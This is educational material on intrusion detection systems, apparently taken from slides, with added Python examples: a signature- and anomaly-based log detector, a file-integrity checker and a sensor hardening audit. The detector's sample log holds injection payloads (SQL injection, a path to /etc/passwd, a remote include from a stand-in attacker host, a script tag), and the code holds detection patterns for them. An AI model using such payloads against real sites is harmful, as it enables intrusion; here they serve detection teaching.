An Intrusion Detection System (IDS) is security software designed to help an
administrator by automatically alerting or notifying whenever a user tries to
compromise an information system through malicious activity, or at the point
where a security policy is violated. It helps deal with such attacks by
inspecting all inbound and outbound traffic on a network.
Types Of Intrusions / Attacks
Web Based Attacks
SQL Injection, Web Shells
LFI, RFI and XSS Attacks
Network Based Attacks
Denial Of Service attacks
Scanning ports and services
Replication of worms, Trojans and viruses
Spoofing attacks (ARP spoofing, DNS spoofing)
Zero Day Attacks
Attacks that aren’t known.
How detection is performed in IDS
Signature-based detection: this type of detection works well with threats
that are already known and have been characterised.
Anomaly-based detection: this detection works on the basis of comparison. It
determines the traits of normal activity and flags the characteristics that
mark an action as abnormal.
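The two detection approaches above, applied to web-server access logs, as an added example that is not part of the original slides. The signature rules, the log lines and the baseline request counts are all constructed for this example; a real sensor would use a maintained rule set and a baseline learned from its own traffic.

```python
import re
from collections import Counter
from statistics import mean, pstdev
from urllib.parse import unquote

# Common Log Format line: src ident user [timestamp] "METHOD URL PROTO" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signature rules (hypothetical, written for this example): name and pattern
# matched against the URL-decoded request URL, one per attack class on the slide.
SIGNATURES = [
    ("sqli", re.compile(r"(?i)'\s*(or|and)\s+\S+\s*=|union\s+select")),
    ("lfi", re.compile(r"\.\./")),
    ("rfi", re.compile(r"(?i)=(https?|ftp)://")),
    ("xss", re.compile(r"(?i)<script|javascript:")),
]

# Constructed baseline: requests per source observed in a quiet training window.
BASELINE_REQUESTS_PER_SOURCE = [4, 5, 6, 5, 4, 6, 5]

# Constructed sample log (not from the original slides): benign browsing,
# one request per web-attack class, and a burst of probes from 10.0.0.11.
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [12/Mar/2024:10:01:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:10:01:03 +0000] "GET /about.html HTTP/1.1" 200 734',
    '10.0.0.9 - - [12/Mar/2024:10:01:04 +0000] "GET /products?id=1 HTTP/1.1" 200 900',
    '10.0.0.9 - - [12/Mar/2024:10:01:05 +0000] "GET /products?id=1%27%20OR%201%3D1 HTTP/1.1" 200 9000',
    '10.0.0.7 - - [12/Mar/2024:10:01:06 +0000] "GET /view?file=../../../../etc/passwd HTTP/1.1" 404 120',
    '10.0.0.7 - - [12/Mar/2024:10:01:07 +0000] "GET /page?include=http://attacker.invalid/shell.txt HTTP/1.1" 404 120',
    '10.0.0.3 - - [12/Mar/2024:10:01:08 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 300',
] + [
    f'10.0.0.11 - - [12/Mar/2024:10:01:09 +0000] "GET /admin{i} HTTP/1.1" 404 0'
    for i in range(12)
])


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it is malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    record = m.groupdict()
    # Decode %27, %3C, ... so that URL-encoded payloads still hit the signatures.
    record["url"] = unquote(record["url"])
    return record


def signature_detect(records):
    """Signature-based: report every record that matches a known-bad pattern."""
    alerts = []
    for r in records:
        for name, pattern in SIGNATURES:
            if pattern.search(r["url"]):
                alerts.append((r["src"], name, r["url"]))
    return alerts


def anomaly_detect(records, baseline_counts, k=3.0):
    """Anomaly-based: flag sources whose request count over the analysed window
    exceeds mean + k * stdev of the baseline, whatever the requests contain."""
    threshold = mean(baseline_counts) + k * pstdev(baseline_counts)
    counts = Counter(r["src"] for r in records)
    return {src: n for src, n in counts.items() if n > threshold}


def run_ids(log_text=SAMPLE_LOG):
    """Run both detectors over a log and return their findings side by side."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    return {
        "signature": signature_detect(records),
        "anomaly": anomaly_detect(records, BASELINE_REQUESTS_PER_SOURCE),
    }


if __name__ == "__main__":
    for kind, findings in run_ids().items():
        print(kind, findings)
```

Note that the probing burst from 10.0.0.11 contains nothing a signature would match, and the four injection-style requests are each a single request, so neither detector alone covers both cases; this is why the two approaches are normally combined.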
Typical intrusion detection functions include:
Monitoring and analyzing both user and system activities
Analyzing system configurations and vulnerabilities
Assessing system and file integrity
Ability to recognize typical patterns of attacks
Analysis of abnormal activity patterns
Tracking user policy violations
Major components of an IDS system
Network Intrusion Detection System (NIDS): this
analyses the traffic on a whole subnet and matches the
traffic passing by against a library of already
known attacks.
Network Node Intrusion Detection System (NNIDS):
This is similar to NIDS, but the traffic is only monitored on a single host, not a
Host Intrusion Detection System (HIDS): this takes a
"picture" of an entire system's file set and compares
it to a previous picture. If there are significant
differences, such as missing files, it alerts the
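The HIDS "picture and compare" idea above, as an added example that is not part of the original slides: a snapshot maps every file to its SHA-256 digest, and comparing two snapshots yields the added, removed and modified files. The directory layout and file contents in `demo()` are constructed for this example.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each regular file under root (as a relative POSIX path) to its SHA-256 digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digests[path.relative_to(root).as_posix()] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_snapshots(old, new):
    """Compare a stored baseline against a fresh snapshot of the same tree."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(name for name in old.keys() & new.keys() if old[name] != new[name]),
    }


def demo():
    """Constructed scenario: baseline of three files, then one is replaced,
    one deleted and one planted; returns the differences a HIDS would report."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"original binary")
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        baseline = snapshot(root)          # the "previous picture"

        (root / "bin" / "ls").write_bytes(b"replaced binary")   # modified
        (root / "etc" / "hosts").unlink()                       # removed
        (root / "tmp").mkdir()
        (root / "tmp" / ".hidden").write_text("dropped file\n") # added

        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

The baseline is only as trustworthy as its storage: keep it (or at least its own digest) off the monitored host, otherwise whoever alters the files can alter the picture they are compared against.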
PROS of an IDS System
CAN add a greater degree of integrity to the rest of your infrastructure
CAN trace user activity from point of entry to point of impact
CAN recognize and report alterations to data
CAN automate a task of monitoring the Internet searching for the latest attacks
CAN detect when your system is under attack
CAN make the security management of your system possible by non-expert staff
CONS Related to an IDS System
CAN NOT compensate for weak identification and authentication mechanisms
CAN NOT conduct investigations of attacks without human intervention
CAN NOT compensate for weaknesses in network protocols
CAN NOT analyze all the traffic on a busy network
CAN NOT always deal with problems involving packet-level attacks
CAN NOT deal with some of the modern network hardware and features
How to protect IDS
• Don’t run any service on your IDS sensor
• The platform on which you are running the IDS should be patched with the
latest release from your vendor
• Configure the IDS machine so that it doesn't respond to ping packets
• User account should not be created except those that are necessary
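A way to audit three of the four sensor-hardening points above (no extra services, no ping replies, no unnecessary accounts) on a Linux sensor, as an added example that is not part of the original slides. It reads the kernel's `/proc/net/tcp`, the `net.ipv4.icmp_echo_ignore_all` sysctl and `/etc/passwd`; the allowlists and the sample inputs in `demo()` are constructed for this example, and the patch-level check is left out because it depends on the vendor.

```python
from pathlib import Path


def listening_tcp_ports(proc_net_tcp):
    """Parse the text of /proc/net/tcp; state 0A is LISTEN and the local port
    is the hex field after the colon in local_address."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:      # skip the header row
        fields = line.split()
        if len(fields) > 3 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports


def audit_sensor(listening_ports, icmp_echo_ignore_all, passwd_lines,
                 allowed_ports=(), allowed_users=()):
    """Return a list of findings; an empty list means the checks passed."""
    findings = []
    extra = sorted(set(listening_ports) - set(allowed_ports))
    if extra:
        findings.append(f"unexpected listening services on TCP ports {extra}")
    if icmp_echo_ignore_all.strip() != "1":
        findings.append("sensor answers ICMP echo (net.ipv4.icmp_echo_ignore_all is not 1)")
    for line in passwd_lines:
        fields = line.split(":")
        if len(fields) < 3 or not fields[2].isdigit():
            continue
        name, uid = fields[0], int(fields[2])
        # UIDs >= 1000 are ordinary (non-system) accounts on most Linux distributions.
        if uid >= 1000 and name not in allowed_users:
            findings.append(f"unnecessary user account: {name}")
    return findings


def live_audit(allowed_ports=(22,), allowed_users=()):
    """Run the checks against the local Linux host; returns None where the
    kernel files are not available (non-Linux or restricted sandbox)."""
    try:
        tcp = Path("/proc/net/tcp").read_text()
        icmp = Path("/proc/sys/net/ipv4/icmp_echo_ignore_all").read_text()
        passwd = Path("/etc/passwd").read_text().splitlines()
    except OSError:
        return None
    return audit_sensor(listening_tcp_ports(tcp), icmp, passwd, allowed_ports, allowed_users)


# Constructed inputs (not captured from a real host): SSH and a web server
# listening, one established client connection, ping replies enabled, and
# two ordinary accounts of which only idsadmin is sanctioned.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 1235 1 0000000000000000 100 0 0 10 0
   2: 0100007F:B2A4 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 1236 1 0000000000000000 20 4 30 10 -1
"""
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "idsadmin:x:1000:1000::/home/idsadmin:/bin/bash",
    "bob:x:1001:1001::/home/bob:/bin/bash",
]


def demo():
    return audit_sensor(listening_tcp_ports(SAMPLE_PROC_NET_TCP), "0", SAMPLE_PASSWD,
                        allowed_ports={22}, allowed_users={"idsadmin"})


if __name__ == "__main__":
    for finding in demo():
        print("FINDING:", finding)
```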